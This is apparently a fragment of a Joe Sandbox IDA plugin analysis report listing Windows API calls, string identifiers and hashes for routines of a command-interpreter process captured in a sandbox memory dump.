                                                                      • Opcode ID: 447a35257a388d1198c68a28f08e99254b3e32a7ba662aaaf4616cb238eb9478
                                                                      • Instruction ID: 69146bb70af0467c5f3977e02e9ce802599a4919679a89a7548833cac47acd0e
                                                                      • Opcode Fuzzy Hash: 447a35257a388d1198c68a28f08e99254b3e32a7ba662aaaf4616cb238eb9478
                                                                      • Instruction Fuzzy Hash: 845141B1A042595AFB20CAA5DC88FAEBBF9EB45344F0400AAE545D2141E738DE84CF25
                                                                      APIs
                                                                      • longjmp.MSVCRT(00080A70,000000FF,00000000,?,00000001,?,?,?,00055833,?, /D /c",?,?,?,00000000,?), ref: 00061271
                                                                      Similarity
                                                                      • API ID: longjmp
                                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                      • API String ID: 1832741078-366822981
                                                                      • Opcode ID: 9722160089e964ded96c86931cd8229856405f78a8968891ccfb631a2377d635
                                                                      • Instruction ID: 7fd852796e5db030fb50bb46f610ce8b336d1f4cecfd0af45f91e3910cf3762c
                                                                      • Opcode Fuzzy Hash: 9722160089e964ded96c86931cd8229856405f78a8968891ccfb631a2377d635
                                                                      • Instruction Fuzzy Hash: 08A1E374704A08FBCF24DE15C9959EEBBA3FF48396B244015F8028B691CB74DE91CB81
                                                                      APIs
                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00080AF0,00002000,00000000,00000000,00000000,00000000), ref: 00047ED4
                                                                        • Part of subcall function 0004A62F: wcschr.MSVCRT ref: 0004A635
                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00080AF0,00002000,?), ref: 00047F16
                                                                      • _ultoa.MSVCRT ref: 0005AFC9
                                                                      • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 0005AFDE
                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 0005AFF3
                                                                      Similarity
                                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                      • String ID: Application$System
                                                                      • API String ID: 3538039442-3455788185
                                                                      • Opcode ID: a9842170fba4c3c068b2c3f92905b84fe08e45527e38f60d8bc2ecd3b98e6062
                                                                      • Instruction ID: b2a42ae65c0db5f5e326cd0cafc79bc7cc9978868f4dbe9d5d93f6b0f3df7b55
                                                                      • Opcode Fuzzy Hash: a9842170fba4c3c068b2c3f92905b84fe08e45527e38f60d8bc2ecd3b98e6062
                                                                      • Instruction Fuzzy Hash: 6E41E2B1740305ABEB249BA4CC89FAF7BA9FB46B41F200139F946DB280DB749D04C756
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: memsetwcschr$_wcsicmpiswspace
                                                                      • String ID: :.\$=,;$=,;+/[] "
                                                                      • API String ID: 1913572127-843887632
                                                                      • Opcode ID: a3e3135cba3faf0e03d42709f1cd5dadf872348153a42e66a34beded98247619
                                                                      • Instruction ID: bf28a8290012672d2c31ae16fce8443e0cd8c76041bf6cf6a386f067b6a5c5c5
                                                                      • Opcode Fuzzy Hash: a3e3135cba3faf0e03d42709f1cd5dadf872348153a42e66a34beded98247619
                                                                      • Instruction Fuzzy Hash: 59A1E5B0A042949BDF74CB68D884BBE77F1FF44314F1401BAE806A7291D774AD85CB5A
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00047669
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00047670
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00047686
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0004768D
                                                                      • _wcsicmp.MSVCRT ref: 00047719
                                                                      • _wcsicmp.MSVCRT ref: 0004772B
                                                                      • _wcsicmp.MSVCRT ref: 00047758
                                                                      • _wcsicmp.MSVCRT ref: 0005AA79
                                                                      Similarity
                                                                      • API ID: Heap_wcsicmp$AllocProcess
                                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                      • API String ID: 435930816-3086019870
                                                                      • Opcode ID: 0813d3585cad260396f04c6120ae1f7ab240a7575798d531b653d0a4f8e365ed
                                                                      • Instruction ID: b6f2e086f0d4fc28aa165f89900fe6e20d741bb7b383a82de3755754d7de7cb4
                                                                      • Opcode Fuzzy Hash: 0813d3585cad260396f04c6120ae1f7ab240a7575798d531b653d0a4f8e365ed
                                                                      • Instruction Fuzzy Hash: 0E5146B170C6019FF7289F34AC05A2737D4FB49314B64443EE94AD7282EF29D841CB6A
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0006AF04
                                                                      • memset.MSVCRT ref: 0006AF2E
                                                                      • memset.MSVCRT ref: 0006AF58
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,0004250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 0006B08B
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 0006B095
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 0006B0AA
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0006B1DA
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0006B1F2
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0006B20A
                                                                      Similarity
                                                                      • API ID: memset$ErrorLast$InformationVolume
                                                                      • String ID: %04X-%04X
                                                                      • API String ID: 2748242238-1126166780
                                                                      • Opcode ID: 771b27c00a32a2c3fb04b6d15a446d149742bbcf6d7a2e248971db0987874eb2
                                                                      • Instruction ID: f8aed3bdf79586401928afbb78486a5e72db7226f5bcd042ca53f0354e2b65a1
                                                                      • Opcode Fuzzy Hash: 771b27c00a32a2c3fb04b6d15a446d149742bbcf6d7a2e248971db0987874eb2
                                                                      • Instruction Fuzzy Hash: 9791A0B1A002289BEB64DB24CC95BEA77FAEF15304F4005E9E509E7141EB349FC48F95
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: wcschr$iswspace
                                                                      • String ID: =,;
                                                                      • API String ID: 3458554142-1539845467
                                                                      • Opcode ID: ac1a9ef2ec964f048a4dd515df60eb3333e0db4e709eaa5938164f20261b5c1f
                                                                      • Instruction ID: b5ab1f778bdf5d76f993618e9aafd128bf21bc87d14224bcc64f80af088ff340
                                                                      • Opcode Fuzzy Hash: ac1a9ef2ec964f048a4dd515df60eb3333e0db4e709eaa5938164f20261b5c1f
                                                                      • Instruction Fuzzy Hash: CC81AFF4A002158BEB709F65CC457BA72F5AF50305F1444BAED8AA7241FB74CD88CB69
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                      • String ID: +-~!
                                                                      • API String ID: 2191331888-2604099254
                                                                      • Opcode ID: 4a9913c82c39f42f12580bede3e36355076b4ffc30f6fb7b0354d4f853eb3c19
                                                                      • Instruction ID: 97662c6aa75b01413c00b825d8badbef3fd74ab7905deadf6f1aac44061f867c
                                                                      • Opcode Fuzzy Hash: 4a9913c82c39f42f12580bede3e36355076b4ffc30f6fb7b0354d4f853eb3c19
                                                                      • Instruction Fuzzy Hash: 7E518B71500609EBDB10DF64D8459EF37A9EF063A2B108526FD069B150EBB8DF08DBA1
                                                                      APIs
                                                                      • towupper.MSVCRT ref: 00067277
                                                                      • iswalpha.MSVCRT ref: 000672AA
                                                                      • towupper.MSVCRT ref: 000672BD
                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 000672EF
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00067304
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00067311
                                                                      Similarity
                                                                      • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                      • String ID: $%04X-%04X$\
                                                                      • API String ID: 4001382275-467840296
                                                                      • Opcode ID: 6cceab324dd50cfe5303f7fe14823f9a14ebe0a79ac5a6d07cc0ef3dad1003c3
                                                                      • Instruction ID: 6cecf18448bde4c9d99e01a8748ec2080e5b8f869c9e58dbfa061ff7927a948d
                                                                      • Opcode Fuzzy Hash: 6cceab324dd50cfe5303f7fe14823f9a14ebe0a79ac5a6d07cc0ef3dad1003c3
                                                                      • Instruction Fuzzy Hash: 59410CB1204310AAE7206FA59C06EBB73EDEF85B14F14442EF989C6181EB74DA44D7A6
                                                                      APIs
                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00063877), ref: 00062D31
                                                                      Similarity
                                                                      • API ID: ObjectSingleWait
                                                                      • String ID: wil
                                                                      • API String ID: 24740636-1589926490
                                                                      • Opcode ID: 51698bc939be9db8712ec652b8c3e80fe47225248189edd95d1f8800172290bc
                                                                      • Instruction ID: 613ad552fc5cde4dce700921494c7f99958f582b5b1e384d2701a7d57437f81c
                                                                      • Opcode Fuzzy Hash: 51698bc939be9db8712ec652b8c3e80fe47225248189edd95d1f8800172290bc
                                                                      • Instruction Fuzzy Hash: 61318030304A05ABFB309B64CC88BAF36AFEF41361F604036F942D6691D779DD5197A2
                                                                      APIs
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00055294
                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 000552A4
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00061036
                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00061048
                                                                      • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00061064
                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00055134,-00000001), ref: 00061073
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                      • String ID: :$\
                                                                      • API String ID: 3961617410-1166558509
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00051665
                                                                      • memset.MSVCRT ref: 00051689
                                                                      • memset.MSVCRT ref: 000516AD
                                                                      • memset.MSVCRT ref: 000516D1
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 000517CF
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 000517E9
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00051801
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00051813
                                                                        • Part of subcall function 0005260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00051775,-00000001,-00000001,-00000001,-00000001), ref: 00052650
                                                                      Similarity
                                                                      • API ID: memset$BufferConsoleInfoScreen
                                                                      • String ID:
                                                                      • API String ID: 1034426908-0
                                                                      APIs
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00069E02,?,?,00069E02), ref: 00064618
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,00069E02), ref: 00064637
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0007A7F0,00069E02,?,00000000,?,00069E02), ref: 00064646
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,00069E02), ref: 00064653
                                                                      • memcmp.MSVCRT(0007A7F0,000434F8,00000003), ref: 00064693
                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00069E02,00000000,?,00069E02,?,00069E02), ref: 00064720
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00069E02,00000000,00000000,?,00069E02), ref: 00064742
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,00069E02), ref: 0006474F
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0007A7F1,00000001,?,00000000,?,00069E02), ref: 00064764
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,00069E02), ref: 00064771
                                                                      Similarity
                                                                      • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                      • String ID:
                                                                      • API String ID: 2002953238-0
                                                                      APIs
                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,0007A7F0,00000000,?,00000200), ref: 0004C818
                                                                      • wcschr.MSVCRT ref: 0004C882
                                                                      • _get_osfhandle.MSVCRT ref: 0004C8BA
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0004C8C4
                                                                      • _get_osfhandle.MSVCRT ref: 0004C8DB
                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0004C8ED
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 0004C90D
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 0004C91E
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0007A7F0,00000200,00000000,00000000), ref: 0004C934
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 0004C941
                                                                      • _get_osfhandle.MSVCRT ref: 0004CAC4
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0004CACE
                                                                      • memcmp.MSVCRT(0007A7F0,000434F8,00000003), ref: 0005D16E
                                                                      Similarity
                                                                      • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                      • String ID:
                                                                      • API String ID: 1383533039-0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcsicmp
                                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                      • API String ID: 2081463915-1668778490
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00064A7B
                                                                      • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00064B98
                                                                      • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00064BC5
                                                                      • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00064BD2
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00064BDC
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00064C30
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                      • String ID: %s$/-.
                                                                      • API String ID: 1033501010-531045382
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00066745
                                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 000667CF
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 000667F6
                                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,000420B8,00000000,00000002,?,00000000), ref: 00066867
                                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 000668A3
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 000668C5
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CloseValue$CreateDeleteOpen
                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                      • API String ID: 4081037667-3301834661
                                                                      APIs
                                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 0006650F
                                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00), ref: 00066545
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 00066553
                                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 00066590
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 000665AD
                                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,000420B8,?,00000000,02000000,?,?,?,00000000,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 000665D4
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 000665EF
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CloseDeleteValue$CreateOpen
                                                                      • String ID: %s=%s
                                                                      • API String ID: 1019019434-1087296587
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcsnicmpswscanf
                                                                      • String ID: :EOF
                                                                      • API String ID: 1534968528-551370653
                                                                      APIs
                                                                      • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00066069
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 0006607E
                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 000660DC
                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00066128
                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 0006614F
                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00066186
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                      • API String ID: 1580871199-2613899276
                                                                      • Opcode ID: 2b491f3bd3d733ceb77ae40969cf10cd2b9ed5fd43f2e69e021fc770d2c196ab
                                                                      • Instruction ID: 76939fc2d7d5b65e9943274d0352183f401aab3966134eeac2a69fc5581aa08f
                                                                      • Opcode Fuzzy Hash: 2b491f3bd3d733ceb77ae40969cf10cd2b9ed5fd43f2e69e021fc770d2c196ab
                                                                      • Instruction Fuzzy Hash: 3D41B6B0A00219ABFB209B24CC88FBF76BDFB02744F0441A9E605E7281DB349E45CF65
                                                                      APIs
                                                                      • _wcsicmp.MSVCRT ref: 000565A4
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 000565D7
                                                                      • _open_osfhandle.MSVCRT ref: 000565EB
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00062092
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                      • String ID: con
                                                                      • API String ID: 689241570-4257191772
                                                                      • Opcode ID: 2766e244311e8d6a862aeb426b4d57239c018cc4ba80a40f94b04db85b719c32
                                                                      • Instruction ID: bf139c08c3caa9a8aa5435e20ebbc154d8581d09d5f3864a40789a1a88fc7c32
                                                                      • Opcode Fuzzy Hash: 2766e244311e8d6a862aeb426b4d57239c018cc4ba80a40f94b04db85b719c32
                                                                      • Instruction Fuzzy Hash: B3315872A44600AFF7349BA89C49B6F7BE9E741376F30422AE852E31C0EB799D04C751
                                                                      APIs
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 000661D7
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00066211
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00066254
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0006625B
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0006628D
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00066294
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 0006629B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                                      • String ID: PE
                                                                      • API String ID: 3093239467-4258593460
                                                                      • Opcode ID: 19a719d163305ea2994ea93eced1aa025bdec4d15d3510a1c2b79cb1258cae12
                                                                      • Instruction ID: c504367992ad8b50f2c4aa564d69c6cd88de710f724ba97acf74fa19f6f20d26
                                                                      • Opcode Fuzzy Hash: 19a719d163305ea2994ea93eced1aa025bdec4d15d3510a1c2b79cb1258cae12
                                                                      • Instruction Fuzzy Hash: 7131E534B00715ABFF106BA28C29FBE77ABAFC9B11F044205F951E62C0DB799D06C661
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00048060
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 000481BE
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 0004818C
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00048197
                                                                      • longjmp.MSVCRT(00080A30,00000001,-00000001,00000000,?,00000000), ref: 0005B09E
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0005B0AB
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0005B0C1
                                                                      • fprintf.MSVCRT ref: 0005B0D5
                                                                      • fflush.MSVCRT ref: 0005B0E3
                                                                        • Part of subcall function 00048F21: _wcsicmp.MSVCRT ref: 00048FCD
                                                                        • Part of subcall function 00048F21: _wcsicmp.MSVCRT ref: 00048FE3
                                                                        • Part of subcall function 00048F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00049002
                                                                        • Part of subcall function 00048F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00049013
                                                                        • Part of subcall function 00048E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00088BF0,00000000,?), ref: 00048EC3
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D3A
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D44
                                                                        • Part of subcall function 00051CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D57
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D61
                                                                        • Part of subcall function 000501F5: wcsrchr.MSVCRT ref: 000501FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                      • String ID:
                                                                      • API String ID: 3753564779-0
                                                                      • Opcode ID: fe2a480e0ddcf1e11fea2b5ccc1b4eb4e0740763bcdd041d52361e4bd8db7385
                                                                      • Instruction ID: d1f5cbb01a0ef6aa901d125252fa76a4d98349f4fe5c37018b2f627995a66160
                                                                      • Opcode Fuzzy Hash: fe2a480e0ddcf1e11fea2b5ccc1b4eb4e0740763bcdd041d52361e4bd8db7385
                                                                      • Instruction Fuzzy Hash: 715103B0B002119BEB249BB4EC55AAF77F4FF04310F14483AF94AE7292DB389981CB55
